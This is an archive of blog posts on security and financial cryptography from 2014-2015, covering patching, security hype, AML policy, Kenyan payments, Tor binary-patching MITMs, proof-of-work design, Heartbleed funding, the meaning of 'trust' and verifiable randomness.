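A year after disclosure, roughly 18% of hosts remain exploitable - a long, fat tail for attackers to feed on.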


My comments - it is good to see the meme spreading. I first started talking about how updates are an essential part of the toolkit back in the mid-2000s, as a consequence of my 7 scrappy hypotheses. I've recently spotted the security folk in the IETF starting to talk about it, and the Bitcoin hardfork debate has thrown upgradeability into stark relief. Also, the clear capability of Apple to push out updates, the less clear but not awful work by Microsoft in patching, and the disaster that is Android have made it clear:

The future of security includes a requirement to do dynamic updating.

Saying it is easier than doing it, but that's why we're in the security biz.

Posted by iang at 07:32 PM | Comments (0)

October 25, 2015

When the security community eats its own...

If you've ever wondered what that Market for Silver Bullets paper was about, here's Pete Herzog with the easy version:

When the Security Community Eats Its Own

BY PETE HERZOG
http://isecom.org

The CEO of a Major Corp. asks the CISO if the new exploit discovered in the wild, Shizzam, could affect their production systems. He says he doesn't think so, but just to be sure, they will analyze all the systems for the vulnerability.

So his staff is told to drop everything, learn all they can about this new exploit and analyze all systems for vulnerabilities. They go through logs, run scans with FOSS tools, and even buy a Shizzam plugin from their vendor for their AV scanner. They find nothing.

A day later the CEO comes and tells him that the news says Shizzam likely is affecting their systems. So the CISO goes back to his staff to have them analyze it all over again. And again they tell him they don’t find anything.

Again the CEO calls him and says he’s seeing now in the news that his company certainly has some kind of cybersecurity problem.

So now the CISO panics and brings in a whole incident response team from a major security consultancy to go through each and every system with great care. But after hundreds of man-hours spent doing the same things his own staff did, they find nothing.

He contacts the CEO and tells him the good news. But the CEO tells him that he just got a call from a journalist looking to confirm that they’ve been hacked. The CISO starts freaking out.

The CISO tells his security guys to prepare for a full security upgrade. He pushes the CIO to authorize an emergency budget to buy more firewalls and secondary intrusion detection systems. The CEO pushes the budget to the board who approves the budget in record time. And almost immediately the equipment starts arriving. The team works through the nights to get it all in place.

The CEO calls the CISO on his mobile – rarely a good sign. He tells the CISO that the NY Times just published that their company allegedly is getting hacked Sony-style.

They point to the newly discovered exploit as the likely cause. They point to blogs discussing the horrors the new exploit could cause, and what it means for the rest of the smaller companies out there who can’t defend themselves with the same financial alacrity as Major Corp.

The CEO tells the CISO that it's time they bring in the FBI. So he needs him to come explain himself and the situation to the board that evening.

The CISO feels sick to his stomach. He goes through the weeks of reports, findings, and security upgrades. Hundreds of thousands spent and - nothing! There's NOTHING to indicate a hack or even a problem from this exploit.

So wondering if he’s misunderstood Shizzam and how it could have caused this, he decides to reach out to the security community. He makes a new Twitter account so people don’t know who he is. He jumps into the trending #MajorCorpFail stream and tweets, "How bad is the Major Corp hack anyway?"

A few seconds later a penetration tester replies, "Nobody knows xactly but it’s really bad b/c vendors and consultants say that Major Corp has been throwing money at it for weeks."

Read on for the deeper analysis.

Posted by iang at 06:04 AM | Comments (0)

April 03, 2015

Training Day 2: starring Bridges & Force

Readers have probably been watching the amazing story of the Bridges & Force arrests in the USA. It's starting to look much like a film, and the one I have in mind is this: Training Day.

In short: two agents were sent in to bring down the Silk Road website for selling anything (guns, drugs, etc.). In the process, the agents stole a lot of the money, and went on a rampage through the Bitcoin economy, robbing, extorting, and manipulating their way to riches.

You can't make this up. Worse, we don't need to. The problem is deep, underlying and demented within our society. We're going to see much more of it, and the reason we know this is that we have decades of experience in other countries outside the OECD purview.

These are our own actions coming back to destroy us. In a nutshell, here it is - the short story that gets me on the FATF's blacklist, and you too if you spread it:

In the 1980s, certain European governments got upset about certain forms of arbitrage across nations by multinationals and rich folk. These people found a ready consensus with others in policing work who said that "follow the money" was how you catch the really bad people, a.k.a. criminals. Between these two groups of public servants they felt they could crack open the bank secrecy that was protecting criminals and rich people alike.

So the Anti-Money Laundering or AML project was born, under the aegis of FATF, the Financial Action Task Force, an office created in Paris under the OECD. Their concept was that they would put together rules about how to stop bad money moving through the system. In short: know your customer, and make sure their funds are good. Add in risk management and suspicious activity reporting and you're golden.

On passing these laws, every politician faithfully promised it was only for the big stuff, drugs and terrorism, and would never be used against honest or wealthy or innocent people. Honest Injun!

If only it were so simple. Anyone who knows anything about crime or wealth realises within seconds that this is not going to achieve anything against the criminals or the wealthy. Indeed, it may even make matters worse, because (a) the system is too imperfect to be anything but noise, (b) criminals and the wealthy can bypass the system, and (c) criminals can pay for access. Hold onto that thought.

So, if the FATF had stopped there, then AML would have just been a massive cost on society. Westerners would have paid basis points for nothing, and it would have just been a tool that shut the poor out of the financial system; something some call the problem of the 'unbanked', but that's a subject for another day (and don't use that term in my presence, thanks!). Criminals would have figured out other methods, etc.

If only. Just. But they went further.

In imposing the FATF 40 recommendations (yes, it got a lot more complicated and detailed, of course) everywhere, on everyone, the authorities also stumbled on an ancient truth of bureaucracy without control: we could do more if we had more money! Because, of course, the societal cost of following AML was also hitting the police - implementing this wonderful notion of "follow the money" cost a lot of money.

Until someone had the bright idea: if the money is bad, why can't we seize the bad money and use it to find more bad money?

And so it came to pass. The centuries-honoured principle of 'consolidated revenue' was destroyed, and nobody noticed because "we're stopping bad people." Laws and regs were finagled through to allow money seized in AML operations to be "shared" across the interested good parties. Typically some goes to the local police, and some to federal justice. You can imagine the heated discussions about percentage sharing.

What could possibly go wrong?

Now the police were empowered not only to seize vast troves of money, but also to keep part of it. In the twinkling of an eye, your local police force was incentivised to look at the cash pile of everyone in their local society and 'find' a reason to bust. And, as time went on, they built their system to be robust to errors: even if they were wrong, the chances of any comeback were infinitesimal, and at worst the take might be reduced.

AML became a profit center. Why did we let this happen? Several reasons:

1. It's in part because "bad guys have bad money" is such a compelling story that none dare question those who take "bad money from bad guys."

Indeed, money laundering is such a common criminal indictment in the USA simply because people assume it's true on the face of it. The crime itself is almost as simple as moving a large pot of money around - which, if you understand criminal proceedings, makes no sense at all. How can moving a large pot of money around be proven to be ML before you've proven a predicate crime? But so it is.

2. How could we as a society be so stupid? It's because the principle of 'consolidated revenue' has been lost in time. The basic principle is simple: *all* monies coming into the state must go to the revenue office. From there they are spent according to the annual budget. This principle is there not only for accountability but to stop the local authorities becoming the bandits. The concept goes back all the way to the Magna Carta, which was literally and principally about the barons securing the right to a trial /over arbitrary seizure of their wealth/.

We dropped the ball on AML because we forgot history.

So what's all this to do with Bridges & Force? Well, recall that thought: the serious criminals can buy access. Which of course they've been doing since the beginning; the AML authorities themselves are victims of corruption.

As the various insiders in AML are corrupted, it becomes a corrosive force. Some insiders see people taking bribes and can't prove anything. Of course, these people aren't stupid - these are highly trained agents. Eventually they work out that they can't change anything and that the crooks will never be ousted from inside the AML authorities. And they start with a little on the side. A little becomes a lot.

Every agent in these fields is exposed to massive corruption right from the start. It's not as if agents sent into these fields are bad. Quite the reverse, they are good and are made bad. The way AML is constructed it seems impossible that there could be any other result - Quis custodiet ipsos custodes? or Who watches the watchers?

Remember the film Training Day? Bridges and Force are a remake, a sequel, this time moved a bit further north and with the added sex appeal of a cryptocurrency.

But the important thing to realise is that this isn't unusual - it's embedded. AML is fatally corrupted because (a) it can't work anyway, (b) it breached the principle of consolidated revenue, (c) it turned its own agents into victims, and then (d) into the bad guys.

Until AML itself is unwound, we can't - society, police, authorities, bitcoiners - get back to the business of fighting the real bad guys. I'd love to talk to anyone about that, but unfortunately the agenda is set. We're screwed as a society until we unwind AML.

Posted by iang at 06:15 PM | Comments (0)

February 16, 2015

Google's BebaPay to close down, Safaricom shows them how to do it

In news today, BebaPay, the Google transit payment system in Nairobi, is shutting down. As predicted on this blog, the payment system was a disaster from the start, primarily because it did not understand the governance (aka corruption) flow of funds in the industry. This resulted in the erstwhile operators of the system conspiring to make sure it would not work.

How do I know this? I was in Nairobi when it first started up, and we were analysing a lot of market sectors for payments technology at the time. It was obvious to anyone who had actually taken a ride on a Matatu (the little buses that move millions of Kenyans to work) that automating their fares was a really tough sell. And, once we figured out from inside sources how the flow of funds for the Matatu business worked, we knew a digital payments scheme was dead on arrival.

As an aside there is a play that could have been done there, in a nearby sector, which is the tuk-tuks or motorbike operators that are clustered at every corner. But that's a case-study for another day. The real point to take away here is that you have to understand the real flows of money, and when in Africa, understand that what we westerners call corruption means that our models are basically worthless.

Or in shorter terms, take a ride on the bus before you decide to improve it.

Meanwhile, in other news, Safaricom is now making a big push into the retail POS world. This was also in the wings at the time, and when I was there, we got the inside look into this field thanks to a friend who was running a plucky little M-Pesa facilitation business for retailers. He was doing great stuff, but the elephant in the room was always Safaricom, and it was no polite, toilet-trained beast. Its reputation for stealing other companies' business ideas was legend; in the payment systems world, you're better off modelling Safaricom as a bank.

Ah, that makes more sense... You'll note that Safaricom didn't press over-hard to enter the transit world.

The other great takeaway here is that westerners should not enter into the business of Africa lightly, if at all. Westerners' biggest problem is that they don't understand the conditions there, and consequently they will be trapped in a self-fulfilling cycle of western pseudo-economic drivel. Perhaps even more surprising, they also can't turn to their reliable local NGOs or government partners or consultancies, because these people are trained & paid by the westerners to feed back the same academic models.

How to break out of that trap economically is a problem I've yet to figure out. I've now spent a year outside the place, and I can report that I have met maybe 4 or 5 people amongst, say, 100 who actually understand the difference. Not one of them is employed by an NGO, aid department, consultancy, etc. And these impressive organisations around the world that specialise in Africa are all in the same situation -- totally misinformed and often dangerously wrong.

I feel very badly for the poor of the world, they are being given the worst possible help, with the biggest smile and a wad of cash to help it along its way to failure.

Which leads me to a pretty big economic problem - solving this requires teaching, over a single coffee, what took me years to learn; it can't be done. I suspect you have to go there, but even that isn't saying what's what.

Luckily however the developing world -- at least the parts I saw in Nairobi -- is now emerging with its own digital skills to address their own issues. Startup labs abound! And, from what I've seen, they are doing a much better job at it than the outsiders.

So, maybe this is a problem that will solve itself? Growth doesn't happen at more than 10% pa, so patience is perhaps the answer, not anger. We can live and hope, and if an NGO does want to take a shot at the title, I'm in for the 101st coffee.

Posted by iang at 07:59 AM | Comments (1)

December 03, 2014

MITM watch - patching binaries at Tor exit nodes

Real MITMs are so rare that protocols designed around them fall to the Bayesian impossibility syndrome (*). In short, the stream of false negatives causes the system to be ignored, and when the real negative indicator turns up, it too is treated as a false one. Ignored. Fail.

Here's some evidence of that with Tor:

... I tested BDFProxy against a number of binaries and update processes, including Microsoft Windows Automatic updates. The good news is that if an entity is actively patching Windows PE files for Windows Update, the update verification process detects it, and you will receive error code 0x80200053.

.... If you Google the error code, the official Microsoft response is troublesome.

If you follow the three steps from the official MS answer, two of those steps result in downloading and executing a MS 'Fixit' solution executable. ... If an adversary is currently patching binaries as you download them, these 'Fixit' executables will also be patched. Since the user, not the automatic update process, is initiating these downloads, these files are not automatically verified before execution as with Windows Update. In addition, these files need administrative privileges to execute, and they will execute the payload that was patched into the binary during download with those elevated privileges.
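
The missing step is verification against something the MITM cannot patch. A minimal sketch of that defence, with a hypothetical URL and a digest assumed to have been published out-of-band:

    import hashlib
    import urllib.request

    URL = "https://example.com/fixit.exe"        # hypothetical download
    EXPECTED_SHA256 = "0123456789abcdef" * 4     # obtained out-of-band (assumed)

    # hash the downloaded bytes and compare before ever executing them
    data = urllib.request.urlopen(URL).read()
    digest = hashlib.sha256(data).hexdigest()
    if digest != EXPECTED_SHA256:
        raise SystemExit("binary modified in transit - refusing to execute")
    print("hash verified; safe to run")

An exit node patching the bytes in transit fails the check - provided the expected hash itself didn't travel through the same exit node.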

And, tomorrow, another MITM!

(*) I'd love to hear a better name than Bayesian impossibility syndrome, which I just made up. It's pretty important: it explains why the current SSL/PKI/CA MITM protection can never work, relying on Bayesian statistics to explain why infrequent real attacks cannot be defended against when they are overshadowed by frequent false negatives.

Posted by iang at 09:40 AM | Comments (0)

September 22, 2014

More on Useful Proof of Work

Since posting that thought balloon on proof of work and its unfortunate social costs, I've been informed in private conversation that there are two considerations that I missed:

1. if the cost of the proof of work is brought down to zero by means of some re-use of the hashing, whatever that is, then we bring into question the security of the network. The network is secured literally because it costs to vote. If the vote is free, in some sense or other, then those with a free vote can seek to dominate.

2. the proof of work suffers a security weakness in that it must be verifiable at much lower cost than doing the work, as otherwise an attacker can provide junk proofs.

On the first, it is somewhat clear that this is the case in grand principle, but examining the edge cases reveals some exceptions. Take for example a 1 kilowatt hashing unit that could be used to simply provide building heat. If I use the waste output to heat my house, this is considered to result in a free vote. But this is not an adequate attack at the 51% level; my house isn't that big.

In apparent paradox, PoW as heating leads to more security: if I can heat my house and vote, getting both for the price of one, the effect is still capped at a very low share of the overall hashrate. So the result is more distribution in hashing and mining, rather than less, and this is a defence against today's more worrying trend, the concentration of mining in few people's hands.

More distribution directly attacks one of the flaws of the current system. So how about this: instead of selling the latest hardware in megawatt sizes, sell some smaller units in kilowatt sizes. I'd happily run a kilowatt-grade heater instead of a bar heater, especially if it had a little panel on it showing its progress on voting, and it occasionally purred as it earned some proportion of heating costs back in shares in a hashpool.

On the second: cheaply verifiable problems are rare, but they are not non-existent. Specifically, verification of some public key signatures is one -- RSA verification with a small public exponent, for instance, is far cheaper than signing. So why can't the PoW be refactored to produce public key signatures?

For example, big SSL servers often outsource the hard crypto to accelerators and so forth; if the hard iron being built now could also be used for that task, two things become possible. One is that the research effort being expended could be shared across the two requirements. Right now, all this ASIC building is resulting in some usefully fast petahashing, but that has only limited spin-off potential beyond bitcoin mining.

The second possibility: when a bitcoin mining rig passes its 6-month viability window and becomes just more mining excrement, it can then be re-purposed to some other task. I would happily pay $1000 for something that hypothetically sped up my signature signing or verification by a factor of 1000. The fact that this device would have fetched 100 times as much 6 months back and scored me 25 BTC every week isn't a problem, but an opportunity: for both myself and the old owner.

How would this be done in practice? Well, I want to load up my key in the device and run sigs through it. So we would need a design where each block's PoW were dependent on the full operation of a private/public key and hash signing process. E.g., take the last block, use the entropy within it to feed a known DRBG, create a deterministic private key pair, and load that up. Keep feeding the PoW machine new signature inputs ...
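Here's a minimal sketch of such a round in Python, assuming the third-party python-ecdsa package; the construction and every name in it are my own illustration of the thought balloon above, not a fielded design.

import hashlib, random
from ecdsa import SigningKey, SECP256k1   # third-party: pip install ecdsa

def round_key(prev_block_hash: bytes) -> SigningKey:
    # Deterministic per-round key derived from the last block's entropy,
    # standing in for a proper DRBG construction (and ignoring the negligible
    # chance the seed falls outside the group order).
    seed = hashlib.sha256(b"pow-round-key" + prev_block_hash).digest()
    return SigningKey.from_string(seed, curve=SECP256k1)

def do_work(prev_hash: bytes, inputs: list) -> list:
    # The "work" is producing signatures over a stream of customer inputs.
    sk = round_key(prev_hash)
    return [sk.sign(m) for m in inputs]

def spot_check(prev_hash: bytes, inputs: list, sigs: list, samples: int = 2) -> bool:
    # Verification must be far cheaper than the work, so check only a random
    # sample; a real design needs much more care here (e.g. RSA verification,
    # which is genuinely cheap, or batch verification).
    vk = round_key(prev_hash).get_verifying_key()
    return all(vk.verify(sigs[i], inputs[i])
               for i in random.sample(range(len(inputs)), samples))

prev = hashlib.sha256(b"block 12345").digest()
msgs = [f"sig-input-{i}".encode() for i in range(10)]
print(spot_check(prev, msgs, do_work(prev, msgs)))   # True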

But, these ruminations aside, it appears that the socially unbeneficial criticism of PoW is a bent arrow. The purpose of PoW is much more subtle than might seem from first appearances. I think it is important to find a more socially aligned method, but it seems equally likely that the existing PoW of petahashing will be very hard to dislodge.

Posted by iang at 04:09 PM | Comments (3) | TrackBack

September 03, 2014

Proof of Work made useful -- auctioning off the calculation capacity is just another smart contract

Just got tipped to Andrew Poelstra's faq on ASICs, where he says of Adam Back's Proof of Work system in Bitcoin:

In places where the waste heat is directly useful, the cost of mining is merely the difference between electric heat production and ordinary heat production (here in BC, this would be natural gas). Then electricity is effectively cheap even if not actually cheap.

Which is an interesting remark. If true -- assume we're in Iceland where there is a need for lots of heat -- then Bitcoin mining can be free at the margin. Capital costs remain, but we shouldn't look a gift horse in the mouth?

My view remains, and was from the beginning of BTC when Satoshi proposed his design, that mining is a dead-weight loss to the economy because it turns good electricity into bad waste, heat. And, the capital race adds to that, in that SHA2 mining gear is solely useful for ... Bitcoin mining. Such a design cannot survive in the long run, which is a reflection of Gresham's law, sometimes expressed as the simplistic aphorism of "bad money drives out good."

Now, the good thing about predicting collapse in the long run is that we are never proven wrong, we just have to wait another day ... but as Ben Laurie pointed out somewhere or other, the current incentives encourage the blockchain mining to consume the planet, and that's not another day we want to wait for.

Not a good thing. But if we switch production to some more socially aligned pattern /such as heating/, then likely we could at least shift some of the mining to a cost-neutrality.

Why can't we go further? Why can't we make the information calculated socially useful, and benefit twice? E.g., we can search for SETI, fold some DNA, crack some RSA keys. Andrew has commented on that too, so this is no new idea:

7. What about "useful" proofs-of-work?

These are typically bad ideas for all the same reasons that Primecoin is, and also bad for a new reason: from the network's perspective, the purpose of mining is to secure the currency, but from the miner's perspective, the purpose of mining is to gain the block reward. These two motivations complement each other, since a block reward is worth more in a secure currency than in a sham one, so the miner is incentivized to secure the network rather than attacking it.

However, if the miner is motivated not by the block reward, but by some social or scientific purpose related to the proof-of-work evaluation, then these incentives are no longer aligned (and may in fact be opposed, if the miner wants to discourage others from encroaching on his work), weakening the security of the network.

I buy the general gist of the alignments of incentives, but I'm not sure that we've necessarily unaligned things just by specifying some other purpose than calculating a SHA2 to get an answer close to what we already know.

Let's postulate a program that calculates some desirable property. Because that property is of individual benefit, some individual can pay for it. Then the missing link would be to create a program that takes in a certain amount of money and distributes it to the nodes that run it, according to some fair algorithm.

What's a program that takes in and holds money, gets calculated by many nodes, and distributes it according to an algorithm? It's Nick Szabo's smart contract distributed over the blockchain. We already know how to do that, in principle, and in practice there are many efforts out there to improve the art. Especially, see Ethereum.

So let's assume a smart contract. Then the question arises: how do you get your smart contract accepted as the block calculation for 17:20 this coming Friday evening? That's a consensus problem. Again, we already know how to do consensus problems. But let's postulate one method: hold a donation auction, and simply order the candidates according to the amount donated. Close the block a day in advance and leave that entire day to work out which is the consensus pick on what happens at 17:20.

Didn't get a hit? If your smart contract doesn't win the slot, then at 17:30 it expires and sends back the money. Try again, put in more money? Or we can imagine a variation where it has a climbing ramp of value: it starts at 10,000 at 17:20 and then adds 100 for each of the next 100 blocks, then expires. This then allows an auction crossing, which can be efficient.
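As a toy of those ordering mechanics in Python (the names and numbers are mine, purely illustrative): candidates bid with donations, the highest standing bid wins the slot, and the ramp variant lets a losing bid climb per block until it expires.

from dataclasses import dataclass

@dataclass
class Bid:
    contract_id: str
    donation: int        # paid in at submission, refunded on expiry
    ramp_step: int = 0   # climbing-ramp variant: added per block past the slot

    def standing(self, blocks_past_slot: int) -> int:
        # The effective bid rises per block, capped at 100 steps, then expires.
        return self.donation + self.ramp_step * min(blocks_past_slot, 100)

def pick_winner(bids: list, blocks_past_slot: int = 0) -> Bid:
    # Consensus-by-ordering: the highest standing donation takes the slot.
    return max(bids, key=lambda b: b.standing(blocks_past_slot))

bids = [Bid("fold-dna", 10_000, ramp_step=100), Bid("seti-search", 10_500)]
print(pick_winner(bids, 0).contract_id)    # seti-search wins at 17:20
print(pick_winner(bids, 10).contract_id)   # fold-dna's ramp overtakes it later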

An interesting attack here might be that I could code up a smartcontract-block-PoW that has a backdoor, similar to the infamous DUAL_EC random number generator from NIST. But, even if I succeed in coding it up without my obfuscated clause being spotted, the best I can do is pay for it to reach the top of the rankings, then win my own payment back as it runs at 17:20.

With such an attack, I get my cake calculated and I get to eat it too. As far as incentives go to the miner, I'd be better off going to the pub. The result is still at least as good as Andrew's comment, "from the network's perspective, the purpose of mining is to secure the currency."

What about the 'difficulty' factor? Well, this is easy enough to specify, it can be part of the program. The Ethereum people are working on the basis of setting enough 'gas' to pay for the program, so the notion of 'difficulty' is already on the table.

I'm sure there is something I haven't thought of as yet. But it does seem that there is more of a benefit to wring from the mining idea. We have electricity, we have capital, and we have information. Each of those is a potential for a bounty, so as to claw some sense of value back instead of just heating the planet to keep a bunch of libertarians with coins in their pockets. Comments?

Posted by iang at 02:12 PM | Comments (5) | TrackBack

August 14, 2014

Heartbleed v Ethereum v Tezos: has the Open Source model utterly failed to secure the world's infrastructure? Or is there a missing trick here?

L.M. Goodman stated in a recent paper on Tezos:

"The heartbleed bug caused millions of dollars in damages."

To which I asked what the cites were. His immediate response (thanks!) was "Nothing very academic" but the links were very interesting in and of themselves.

First up, a number for the cost of Heartbleed:

....To put an actual number on it, given some historical precedence, I think $500 million is a good starting point [to the cost of Heartbleed].

So, read the entire article for your view, but I'll take the $500m as given for this post. It's a number, right? Then:

Big tech companies offer millions after Heartbleed crisis Thu, Apr 24 12:00 PM EDT By Jim Finkle

BOSTON (Reuters) - The world's biggest technology companies are donating millions of dollars to fund improvements in open source programs like OpenSSL, the software whose "Heartbleed" bug has sent the computer industry into turmoil.

Amazon.com Inc, Cisco Systems Inc, Facebook Inc, Google Inc, IBM, Intel Corp and Microsoft Corp are among a dozen companies that have agreed to be founding members of a group known as Core Infrastructure Initiative. Each will donate $300,000 to the venture, which is recruiting more backers among technology companies as well as the financial services sector.

Other early supporters are Dell, Fujitsu Ltd, NetApp Inc, Rackspace Hosting Inc and VMware Inc.

The industry is stepping up after the group of developers who volunteer to maintain OpenSSL revealed that they received donations averaging about $2,000 a year to support the project, whose code is used to secure two-thirds of the world's websites and is incorporated into products from many of the world's most profitable technology companies.

What is truly outstanding is that last number: $2,000 a year supports an infrastructure on which the world's websites reside.

Which infrastructure was hit by a minor glitch which caused $500m of costs.

This is a wtf moment! What can we conclude from this 250,000 to 1 ratio? Try these thoughts on for size:

  • Open source drives the SSL business, because Apache, Chrome and Mozilla control the lion's share of activity in SSL. Has the model of open source failed to keep ecommerce reasonably secured? What appears clearer is that the open source model adds nothing to the accounting for the value to society of this infrastructure. We could argue that accounting isn't its job, but some proponents argue vociferously that source code should not be charged for, which is an accounting statement. So I'd say this is a germane point, because the marketing of the open source community may be making us less secure, if OpenSSL developers find it hard to charge for their work.
  • The "many eyeballs" theory is open source's main claim to security. Is this a sick joke which just cost society $500m or is this an outlier never to be repeated? Or proof that it's working?
  • This all isn't to say that the paid model is better; the paid alternative includes its own disasters. But the paid model does typically carry liability and allocate maintenance out of the revenues. Open source doesn't seem to do that.
  • Echoes of Y2K -- even though the combined spend was $500m, we still see no damages. No bad guys slipped in and stole any money, that we know of. Yes, there was one attack on CRA which cost a few hundred data sets, but because the damage was caught early, we simply don't know whether spending $500m saved us anything.
  • The direct cause of costs here is one of upgrade. A sysadmin wants to hit the button and upgrade from BAD OpenSSL to GOOD. Why is that so hard? How do you upgrade SSL? Fixing bugs works in slow time because of burdensome commit privileges and the long supply chain; putting through protocol changes works in even slower time. At the protocol level, the IETF working group process is good at adding in algorithms (around 350 available, yoohoo!) but has no answer for taking things away; the combined effect of these 'essential processes' leads to an OODA cycle of 3.5 years to 80% rollout, as measured over the renegotiation bug.

This is not an attack on the people; the ones I've met are not bad people, diligently doing their part. This is an attack on the change process, which today sucks at a ratio of 250,000 to one.

$500,000,000 ⇒ $5,000,000 → $2,000

This is a widespread, burning issue, so let's look at two positive lessons from the Bitcoin world.

Bitcoin faces the same developer shortage. As Bitcoin developers get snapped up by well-heeled startup ventures with millions in VC money, and as the altCoins and side-chains and ripples and ethereums and now Tezos snap at its heels with alternatives, the need for change goes up while developer availability goes down. L.M. Goodman makes the same point, that upgrade is the Achilles heel of all successful software systems:

Abstract: The popularization of Bitcoin, a decentralized crypto-currency has inspired the production of several alternative, or "alt", currencies. Ethereum, CryptoNote, and Zerocash all represent unique contributions to the crypto-currency space. Although most alt currencies harbor their own source of innovation, they have no means of adopting the innovations of other currencies which may succeed them.

Is this the same thing that happened to OpenSSL?

As an emerging model, new startups such as Ripple and Ethereum have done pre-mines: massive creation of paper value before letting loose the system in the wild. These paper values are then hoarded in foundations in order to pay for developers. As the system becomes popular, the value rises and more developers can be paid for.

Now, leaving aside the obvious problems of self-enrichment and bubble-blowing, it is at least a way to address the problems highlighted by the Heartbleed response above. For example, last Friday, Gavin Wood stated that Ethereum had raised $15m or so in BTC before they'd even shipped a real money client, which puts them several times ahead of OpenSSL. Not shabby, especially compared to the combined efforts of the world's powerful tech cabal.

And, stupidly, thousands of times ahead of OpenSSL's contributions pittance of $2,000 per year.

Of course, this situation only applies to a very cool segment of the market: those cryptocurrencies which manage to garner mass attention. But it does raise a theoretical possibility at least: imagine if every open source project were also to issue their own currency?

And do their pre-mine, with say 50% reserved for developers? Obviously, it's valueless stuff at the start ... until the project booms in popularity, and the currency rises in value. Which is the alignment we want -- cash for programmers as the software starts to prove itself.

Think about a new model of open source + foundation + pre-mine -- if OpenSSL or Eclipse or Firefox were their own money, they'd also solve the problem of paying for developers. (The obvious objection that "Eclipse is not a currency" is just your lack of experience; contact any experienced financial cryptographer for how to solve that.)


Then, once you've got the money, how does it get spent? Upgrade is also a huge problem for the Bitcoin world. Adam Back has proposed two-way pegging to address the need to set up side chains for development purposes and also altCoin purposes. I've heard other ideas too, and for once, Microsoft and Apple are on the right side here with their patch Tuesdays and App Store processes.

Close with Goodman again:

We aim to remedy the potential for atrophied evolution in the crypto-currency space by presenting Tezos, a generic and self-amending crypto-ledger. Tezos can instantiate any blockchain based protocol. Its seed protocol specifies a procedure for stakeholders to approve amendments to the protocol, including amendments to the amendment procedure itself. Upgrades to Tezos are staged through a testing environment to allow stakeholders to recall potentially problematic amendments.

Maybe the new model is open source + foundation + pre-mine + dynamic upgrade?

Posted by iang at 06:14 AM | Comments (2) | TrackBack

July 23, 2014

on trust, Trust, trusted, trustworthy and other words of power

What follows is the clearest exposition of the doublethink surrounding the word 'trust' that I've seen so far. This post by Jerry Leichter on the Crypto list doesn't actually solve the definitional issue, but it does map out the minefield nicely. Trustworthy?

On Jul 20, 2014, at 1:16 PM, Miles Fidelman <...> wrote:
>> On 19/07/2014 20:26 pm, Dave Horsfall wrote:
>>>
>>> A trustworthy system is one that you *can* trust;
>>> a trusted system is one that you *have* to trust.
>>
> Well, if we change the words a little, the government
> world has always made the distinction between:
> - certification (tested), and,
> - accreditation (formally approved)

The words really are the problem. While "trustworthy" is pretty unambiguous, "trusted" is widely used to mean two different things: We've placed trust in it in the past (and continue to do so), for whatever reasons; or as a synonym for trustworthy. The ambiguity is present even in English, and grows from the inherent difficulty of knowing whether trust is properly placed: "He's a trusted friend" (i.e., he's trustworthy); "I was devastated when my trusted friend cheated me" (I guess he was never trustworthy to begin with).

In security lingo, we use "trusted system" as a noun phrase - one that was unlikely to arise in earlier discourse - with the *meaning* that the system is trustworthy.

Bruce Schneier has quoted a definition from some contact in the spook world: A trusted system (or, presumably, person) is one that can break your security. What's interesting about this definition is that it's like an operational definition in physics: It completely removes elements about belief and certification and motivation and focuses solely on capability. This is an essential aspect that we don't usually capture.

When normal English words fail to capture technical distinctions adequately, the typical response is to develop a technical vocabulary that *does* capture the distinctions. Sometimes the technical vocabulary simply re-purposes common existing English words; sometimes it either makes up its own words, or uses obscure real words - or perhaps words from a different language. The former leads to no end of problems for those who are not in the field - consider "work" or "energy" in physics. The latter causes those not in the field to believe those in it are being deliberately obscurantist. But for those actually in the field, once consensus is reached, either approach works fine.

The security field is one where precise definitions are *essential*. Often, the hardest part in developing some particular secure property is pinning down precisely what the property *is*! We haven't done that for the notions surrounding "trust", where, to summarize, we have at least three:

1. A property of a sub-system a containing system assumes as part of its design process ("trusted");
2. A property the sub-system *actually provides* ("trustworthy").
3. A property of a sub-system which, if not attained, causes actual security problems in the containing system (spook definition of "trusted").

As far as I can see, none of these imply any of the others. The distinction between 1 and 3 roughly parallels a distinction in software engineering between problems in the way code is written, and problems that can actually cause externally visible failures. BTW, the software engineering community hasn't quite settled on distinct technical words for these either - bugs versus faults versus errors versus latent faults versus whatever. To this day, careful papers will define these terms up front, since everyone uses them differently.

-- Jerry

Posted by iang at 05:05 AM | Comments (1) | TrackBack

May 25, 2014

How much damage does one hacker do? FBI provides some estimates.

John Young points to some information on a conviction settlement for a hacker caught participating in LulzSec, which term the FBI explains as:

“Lulz” is shorthand for a common abbreviation used in Internet communications – LOL – or “laughing out loud.” As explained on LulzSec’s website, LulzSec.com, the group’s unofficial motto was “Laughing at your security since 2011.”

Aside from the human interest aspects of the story [0], the FBI calculates some damages (blue page 8, edited to drop non-damages estimates):

In the PSR, Probation correctly calculates that the defendant’s base offense level is 7 pursuant to U.S.S.G. §2B1.1(a)(1) and correctly applies a 22-level enhancement in light of a loss amount between $20 million and $50 million 4; a 6-level enhancement given that the offense involved more than 250 victims; ...

_____
4 This loss figure includes damages caused not only by hacks in which Monsegur personally and directly participated, but also damages from hacks perpetrated by Monsegur’s co- conspirators in which he did not directly participate. Monsegur’s actions personally and directly caused between $1,000,000 and $2,500,000 in damages. ...


That last number range of $1m to $2.5m damages is interesting, and can be contrasted with his 10 direct victims (listed on blue pages 5-6) exploited over a 1-year period.

One could surmise that this isn't an optimal solution. E.g., hypothetically, if the 10 victims had each paid a tenth of their losses, they'd have raised a salary of $100-250k, put the perp to productive work, and we'd all be in net profit [1].

Obviously society didn't solve this efficiently, due to information problems. LulzEconSec, anyone?

__________
[0] this post was originally a post on Cryptography lists.
[1] Additional comments on the 'profit' side, blue page 13:

"Although difficult to quantify, it is likely that Monsegur’s actions prevented at least millions of dollars in loss to these victims."
and blue page 16:
"Through Monsegur’s cooperation, the FBI was able to thwart or mitigate at least 300 separate hacks. The amount of loss prevented by Monsegur’s actions is difficult to fully quantify, but even a conservative estimate would yield a loss prevention figure in the millions of dollars."

Posted by iang at 07:19 AM | Comments (3) | TrackBack

May 19, 2014

How to make scientifically verifiable randomness to generate EC curves -- the Hamlet variation on CAcert's root ceremony

It occurs to me that we could modify the CAcert process of verifiably creating random seeds to make it also scientifically verifiable, after the event. (See last post if this makes no sense.)

Instead of bringing a non-deterministic scheme, each participant could bring a deterministic scheme which is hitherto secret. E.g., instead of me using my laptop's webcam, I could use a Gutenberg copy of Hamlet, which I first declare in the event itself.

Another participant could use Treasure Island, a third could use Cien años de soledad.

As nobody knew what the other participants were going to declare, and the honest players amongst us each made a best-efforts guess at a fresh, hitherto-undeclared tome, we can be sure that if there is at least one honest, non-conspiring party, then the result is random.

And it is now verifiable post facto, because we know the inputs.
